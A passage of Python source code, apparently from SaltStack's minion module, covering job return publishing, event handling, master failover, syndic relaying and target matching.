if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning('Cannot run startup_states when \'master_type\' is '
'set to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.')
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Minion of "{0}" is handling event tag \'{1}\''.format(self.opts['master'], tag))
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug('Connected to master {0}'.format(data['schedule'].split(master_event(type='alive', master=''))[1]))
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug('Updating auth data for {0}: {1} -> {2}'.format(
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']))
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
if hasattr(self, 'schedule'):
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace('Broadcast message received not for this minion, Load: {0}'.format(payload['load']))
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: {0}'.format(args[1]))
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def _return_pub_multi(self, values):
for value in values:
yield self._return_pub(value,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event {0}'.format(mtag)) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = self.job_rets[master].values()
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
